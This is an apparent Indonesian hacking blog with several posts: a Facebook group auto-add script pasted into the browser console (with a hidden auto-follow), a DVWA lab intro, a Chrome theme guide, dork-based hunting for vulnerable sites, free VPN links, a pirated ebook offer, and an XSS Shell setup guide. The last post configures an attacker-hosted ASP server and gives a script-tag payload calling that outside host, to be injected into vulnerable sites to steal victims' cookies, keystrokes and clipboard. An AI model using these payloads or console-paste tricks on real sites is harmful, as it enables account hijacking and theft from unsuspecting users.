Auto add group facebook

Facebook situs pertemanan yang populer di dunia maya, yang banyak fitur dan user friendly. Sehingga banyak sekali member facebook yang mendaftar dan orang pun bisa menggunakan situs tersebut untuk mencari teman,pacar, dan hal lainya. Maraknya script autolike membuat orang ingin menggunakan script tersebut, dan saya akan berbagi bagaimana caranya menambahkan teman anda di group dengan cara sederhana tanpa harus via invite pada facebook.

---

How to add member group facebook.

---

1. Download terlebih dahulu script tersebut.

2. Jika sudah anda download silakan anda buka Google crome atau Firefox,silakan login ke facebook anda, pilih group yang anda ingin lakukan add group secara otomatis.

3. Selanjutnya tekan tombol F12 atau klik kanan inspect element >> pilih Console dan anda paste script tersebut di console box dan tekan Enter.

4. Kemudian script tersebut akan bekerja dan muncul popup, seperti gambar dibawah ini.

5. Semua teman anda sudah tambahkan ke group anda dengan cara mudah tanpa invite seperti yang ada pada facebook.

Namun pada script tersebut ada sebuah script autofollow yaitu anda follow seseorang pada ID facebook mereka yang ditambahkan di script tersebut, dan anda juga ditambahkan group mereka.

Enjoy Friend,,,

Pentester dengan DVWA

Damn Vulnerable Web Application (DVWA) adalah sebuah Penetrasion testing untuk membuat seorang security professional atau juga bisa disebut security lab, dengan dvwa anda bisa latihan SQLI, XSS, LFI, CSRF, Brute Force. Dvwa menggunakan sebuah pemrograman PHP dan MYSQL karena kita tahu bahwa kebanyakan website menggunakan bahasa Pemrograman PHP. Dengan DVWA anda bisa latihan SQL Injection secara legal tanpa merusak website, karena dijalankan via Localhost. 

Features :

• SQL Injection
• Cross Site Scripting (XSS)
• Remote File Inclusion (RFI)
• Local File Inclusion (LFI)
• Command Execution
• File Upload
• Brute Force

---

How to Penetration Testing with DVWA

---

Perlu anda ketahui bahwa DVWA hanya dijalankan di server Localhost demi keamanan, jadi untuk membuat server Localhost anda harus mendwonload XAMPP, dan install.

Jika anda sudah punya server Local selanjutnya donwload DVWA disini.

File DVWA harus di tempatkan pada folder C:/xampp/htdocs/

untuk installasi silakan anda akses 127.0.0.1/dvwa selanjutnya silakan login dan klik Setup.

dengan tools ini anda bisa melakukan Pentester SQL Injection.

 Pentester Vulnerability XSS

Jika mempunyai pertanyaan silakan  comment di bawah.


Enjoy Hacking,,

Cara membuat tema browser crome

Google Crome adalah salah satu browser yang user friendly, browser crome dengan banyak fitur yang memudahkan kita untuk browsing. Mulai dari tema extensi browser crome. Dengan adanya Crome web store kita bisa mendapatkan berbagai extensi, tema, dan game. Jika anda berpikir bagaimana caranya membuat tema di browser crome, saya akan memberikan anda sedikit tips atau tutorial tentang Cara membuat tema sendiri di browser Crome. Tidak ada keahlian untuk Pemrograman tentang hal ini, pengunaanya yang sangat mudah untuk anda gunakan.

---

How to Create Theme browser Crome.

---

Extensi

Download terlebih dahulu extensi tersebut Disini.

Setelah anda mendownload maka akan bertambah menu satu pada browser Crome anda.

Selanjutnya klik “Mulai Membuat Tema”.

Upload gambar anda untuk dijadikan background, dan anda atur warna dari browser yang anda inginkan.

 Online

Dengan penyedia website ini anda juga bisa membuat tema sendiri, dengan background photo anda, warna tab, warna teks, dan menempatkan nama anda pada pojok browser, atau nama author. Dan hasilnya lebih bagus.

Visit

Jika anda sudah selesai membuat tema anda bisa membagikan tema buatan anda kepada teman anda, comunity dan sebagianya.

 

Enjoy friends,,,,

Cara menemukan website rentan

Hacker akan mendeface atau exploit sebuah website jika website anda rentan. Namun kebanyakan website yang mudah untuk di jadikan sasaran hacker adalah rentan terhadap SQLI, karena hacker mudah untuk menyerang mungkin saja database leaked dan mungkin halaman index pun ikut berubah. Bagaimana caranya attacker untuk menemukan target website yang rentan ?. Kali ini saya akan membagikan sedikit tips bagiamana caranya menemukan situs rentan terhadapap serangan dan semoga bermanfaat.

---

How to find Website vulnerability ?

---

Disini saya menggunakan dua teknik yaitu :

• Google Hacking
• Web Scanner

Google Hacking

Google hacking atau juga disebut dengan google dork adalah salah satu teknik untuk menemukan sebuah situs itu rentan terhadapap serangan, dengan memasukan keyword akan muncul daftar situs rentan dengan serangan tentunya dengan keyword yang anda masukan. Dengan Google hacking database kita bisa mendapatkan sebuah informasi, misal password, halaman admin dan lainya.

Untuk mempelajari lebih lanjut tentang Google hacking database klik disini.



Web Scanner

Web Application Scanner Vulnerability adalah sebuah software yang di rancang oleh progammer untuk mencari kelemahan website atau bug error, dengan tools ini anda bisa mencari website yang rentan atau menemukan bug error pada website. Ada banyak tools Scanner untuk mencari website yang rentan, Acunetix, WAppEx, dan masih banyak lagi. Namun saya merekomendasikan Acunetix karena toolsnya yang lengkap dan mudah untuk digunakan. Jika anda belum mempunyai software tersebut anda bisa mendownloadnya.



Enjoy hacking,,,

Top alternative VPN tanpa software

Vitual Network Private atau yang biasa disebut dengan VPN hampir mirip dengan Proxy, namun untuk berselancar Anonymous saya senang menggunakan VPN karena kalau kita surfing dengan proxy sering terdetect. Sekarang sudah banyak sekali yang menawarkan jasa VPN, mulai dari perbulan, dan setahun. Kalau kita membeli dari sebuah jasa VPN adalah kita bisa mendapatkan list VPN dari semua negara, jadi jika anda ingin berselancar di negara manapun semua sudah ada. Saya pernah mendapatkan sebuah VPN Pro gratis dari HMA atau Hidemyass untuk masa aktif satu bulan dengan Gratis kalau kita beli bisa $12/Month. Tapi saya akan memberikan VPN gratis tanpa software, namun kebanyakan VPN menyediakan negara USA,Canda,UK . 

 

---

How to Setting .

---

Step 1 : Untuk mendapatkan beberapa VPN gartis USA,Canada,UK anda bisa mengunjungi salah satu situs di bawah ini.

USA VPN :

• http://adf.ly/QeFLz
• http://adf.ly/QeFNN
• http://adf.ly/QeFOz
• http://adf.ly/QeFQI

UK VPN : 

• http://adf.ly/QeFS7
• http://adf.ly/QeFTT
• http://adf.ly/QeFW5
• http://adf.ly/QeFUl

Step 2 : Jika anda sudah mendapatkan data VPN dari situs tersebut, mulai dari Hostname,Username, password, saatnya untuk mensetting agar bisa surfing Anonymous.


Step 3 : Buka Jaringan dan pusat berbagi,  selanjutnya pilih Setel sambungan atau jaringan baru.

Selanjutnya anda pilih menyambungkan ke tempat kerja . klik next.

Selanjutnya buat sambungan baru

Pada alamat Internet Masukan VPN hostname,,

Langkah terakhir adalah memasukan Username dan Password, silakan anda masukan Username dan password dari situs yang anda kunjungi tadi

Klik sambungkan, dan VPN siap digunakan.

Ini adalah salah satu alternative membuka situs yang diblokir seperti  situs facebook dan lainya.



Enjoy Surfing Anonymous,,,,

Free ebook Hacker's Handbook Second Edition

Sebelumnya saya telah berbagi ebook gratis mulai dari CEH V7 dan Hacker's handbook. Kali ini saya akan membagikan ebook gratis yaitu Hacker's Handbook Second Edition. Di ebook ini anda akan mendapatkan berbagai materi dari hacking web application. Mulai dari menemukan SQL Injection, XSS, Security Flaws dan lainya. Ebook ini di sertai dengan nama Tools untuk Inject yang memudahkan kita untuk Penetration Testing. Jika anda melihat ebook ini di Amazon masih harga $29.50. Namun saya membagikan Ebook ini secara gratis. Untuk lebih jelasnya anda bisa melihat isi dari Ebook tersebut. 

Content Of Ebook :

•  Web Application Security
• Core Defense Mechanisms
• Web Application Technologies
• Mapping the Application
• Attacking Cross Site Scripting
• Bypassing Cliens-side Controls
• Attacking Session Management
• Attacking Data Stores
• A web Application Hacker's Toolkit
• And more...

 
 Download via link below,,

Enjoy Learning,,,,

XSS Shell

XSS Shell adalah sebuah script ASP yang sangat mudah untuk melakukan pentester XSS. Dengan XSS shell ini anda bisa mendapatkan cookie, tanpa harus membuat script dengan PHP maupun Javascript. Saya sering menggunakan XSS shell untuk mempermudahkan saya dalam mencoba suatu situs. Dengan XSS shell kita bisa melakukan keylogger, view source halaman website korban, DDoS, dan lainya. Untuk mengenai fitur XSS shell anda bisa membaca Feature di bawah ini.

Feature :

• Get Cookie
• Get Current Page
• Execute custom Javascript
• Get Mouse Log
• Get Keylogger Data
• Get Clipboard
• Get Internal IP Address (Firefox - JVM)
• Check visited links (CSS history hack)
• Crash Browser (if you don’t like your victim!) 

---

How to configure XSS Shell

---

Pertama yang anda lakukan adalah mendownload Shell tersebut disini. Jika file sudah anda download dan di extract, silakan anda cari hosting gratis yang support dengan ASP atau hosting Jabry.net .

Silakan anda buka file "xssshell.asp" dan anda cari script berikut :

// You XSSShell Server
var SERVER = "http://www.xssshelltest.com:60000/";

Silakan anda ganti url tersebut dengan url hosting ASP anda. Contoh saya menggunakan Hosting Jabry dengan url : http://users9.jabry.com/nasrul07, maka url tersebut anda menjadi "http://users9.jabry.com/nasrul07/"

Selanjutnya buka folder Admin dan open file db, dan kita edit source. anda cari dengan code dibawah ini .

'// DATABASE CONFIGURATION
Const DBPATH = "C:\XSS Shell\XSSShell-060\db\shell.mdb"

Untuk mengetahui lokasi database upload file hasil.asp tersbut pada hosting anda. Contoh file lokasi database saya : http://users9.jabry.com/nasrul07/out.asp

pada gambar diatas menunjukan file lokasi database saya adalah : D:\content\users9\nasrul07, maka saya ganti menjadi "D:\content\users9\nasrul07/db/shell.mdb", silakan anda sesuaikan dengan lokasi file anda.


Jika semua langkah diatas selesai, silakan anda upload semua file tersebut di hosting tadi. untuk menampilkan halaman admin XSS shell silakan pergi ke http://users9.jabry.com/nasrul07/admin silakan anda sesuaikan dengan url anda. Dan masukan password w00t. Dan dibawah ini adalah halaman interface dari XSS shell admin.

untuk situs yang rentan XSS kita panggil file xssshell.asp tersebut dengan perintah :

<script src="http://users9.jabry.com/nasrul07/xssshell.asp"></script>

anda bisa memasukan script tersebut pada box pencarian dan lainya.

setelah itu akan ada sebuah IP address dan nomor id Victim.

dan anda kini bisa menjalankan perintah seperti alert,prompt,cookie,keylogger dan lainya.

Contoh :

Saya menggunakan perintah Alert dengan paramater www.nasrul-seven.blogspot.com

maka akan muncul alert atau pop up seperti gambar dibawah ini :

jika ada pertanyaan silakan comment di bawah, No SPAM,,,,




Enjoy Hacking,,,,